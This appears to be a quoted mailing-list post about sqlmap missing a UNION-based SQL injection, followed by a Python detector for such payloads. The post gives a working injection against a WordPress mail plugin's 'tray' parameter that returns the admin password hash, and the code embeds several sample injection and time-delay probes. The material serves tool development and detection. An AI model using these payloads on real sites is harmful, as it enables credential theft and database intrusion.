>>>>> Using a payload such as 'action=getMailMessage&tray=in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1' does result in a response from the server with the hash of the first user:
>>>>>
>>>>> 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]
>>>>>
>>>>>
>>>>> However, sqlmap only finds a time based injection. Looking at sqlmap through burp, I do see sqlmap doesn't try an injection syntax like the one used in the PoC. It may be useful to add a syntax of UNION (SELECT CONCAT(blah, blah, blah) FROM blah).
>>>>>
>>>>> Just a thought!
>>>>>
>>>>>
>>>>> --
>>>>> http://volatile-minds.blogspot.com -- blog
>>>>> http://www.volatileminds.net -- website

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
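What Brandon's three probes and their `[split]` responses show, as an added example (my code, not the thread's or sqlmap's): a small Python checker that flags the UNION and BENCHMARK shapes quoted in this thread in a captured POST body, decodes their 0x.. literals (exposing the marker strings sqlmap wraps its probe in), and tests whether the selected string actually came back in the response's result slot, which is what separated the `LIMIT 1,1#` payload from the one that returned 0. The request/response pairs are constructed from the thread; the function names and the 'q..q' marker heuristic are my assumptions.

```python
import re
import urllib.parse
from dataclasses import dataclass, field

# Request shapes quoted in this thread: a UNION probe wrapped in
# CONCAT(hex,hex,hex) with a "LIMIT 1,1#" tail, the "UNION ALL SELECT 0x.."
# variants, and a BENCHMARK() heavy-query time-based probe.
INDICATORS = {
    "union_select": re.compile(r"\bUNION\s+(?:ALL\s+)?\(?\s*SELECT\b", re.I),
    "benchmark_delay": re.compile(r"\bBENCHMARK\s*\(\s*\d+\s*,", re.I),
    "offset_limit": re.compile(r"\bLIMIT\s+\d+\s*,\s*\d+", re.I),
    "comment_tail": re.compile(r"#|--\s"),
}
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)")


@dataclass
class Finding:
    parameter: str
    value: str
    indicators: list
    decoded_hex: list = field(default_factory=list)


def decode_hex_literals(value):
    """Turn MySQL 0x.. string literals into text (0x66647361 -> 'fdsa')."""
    decoded = []
    for h in HEX_LITERAL.findall(value):
        if len(h) % 2:          # odd length: not a byte string
            continue
        try:
            decoded.append(bytes.fromhex(h).decode("ascii"))
        except UnicodeDecodeError:
            continue            # numeric 0x.. value, not a string
    return decoded


def looks_like_sqlmap_marker(text):
    """Heuristic (my assumption, from the thread's CONCAT probe): its boundary
    strings decode to five lowercase letters starting and ending with 'q'."""
    return (len(text) == 5 and text[0] == text[-1] == "q"
            and text.isalpha() and text.islower())


def inspect_body(body):
    """Flag every parameter of a url-encoded POST body (as a proxy or WAF
    would capture it) that carries one of the shapes above."""
    findings = []
    for name, values in urllib.parse.parse_qs(body, keep_blank_values=True).items():
        for v in values:
            hits = [k for k, rx in INDICATORS.items() if rx.search(v)]
            if hits:
                findings.append(Finding(name, v, hits, decode_hex_literals(v)))
    return findings


def union_result_returned(body, response, slot=1, sep="[split]"):
    """True when a string the UNION probe selected appears in the response's
    result slot, i.e. the database evaluated the injected SELECT and the app
    rendered its row. A '0' there (the probe without 'LIMIT 1,1') means the
    original row was rendered instead; the last field only echoes the input,
    which is the reflection sqlmap reports as 'reflective value(s)'."""
    fields = response.split(sep)
    if len(fields) <= slot:
        return False
    selected = {s for f in inspect_body(body) for s in f.decoded_hex}
    return fields[slot] in selected


def summarize(samples):
    """One row per flagged parameter: (name, indicators, decoded hex, executed)."""
    rows = []
    for body, response in samples:
        for f in inspect_body(body):
            rows.append((f.parameter, f.indicators, f.decoded_hex,
                         union_result_returned(body, response)))
    return rows


# Constructed sample set: the three request/response pairs Brandon quoted.
SAMPLES = [
    ("action=getMailMessage&tray=in_deleted UNION ALL SELECT NULL#&mid=1",
     "1[split]0[split]in_deleted UNION ALL SELECT NULL#[split]"),
    ("action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361#&mid=1",
     "1[split]0[split]in_deleted UNION ALL SELECT 0x66647361#[split]"),
    ("action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361 LIMIT 1,1#&mid=1",
     "1[split]fdsa[split]in_deleted UNION ALL SELECT 0x66647361 LIMIT 1,1#[split]"),
]
# The two payloads sqlmap itself reported in the thread (no response quoted).
UNION_PROBE = ("action=getMailMessage&tray=in_deleted UNION ALL SELECT "
               "CONCAT(0x71786b7171,0x756a6c48694a6a504545,0x71767a6a71) LIMIT 1,1#&mid=1")
TIME_PROBE = ("action=getMailMessage&tray=in_deleted AND "
              "9095=BENCHMARK(5000000,MD5(0x6e434246))-- QPnA&mid=1")

if __name__ == "__main__":
    for row in summarize(SAMPLES):
        print(row)
    for f in inspect_body(UNION_PROBE) + inspect_body(TIME_PROBE):
        markers = [s for s in f.decoded_hex if looks_like_sqlmap_marker(s)]
        print(f.parameter, f.indicators, f.decoded_hex, "markers:", markers)
```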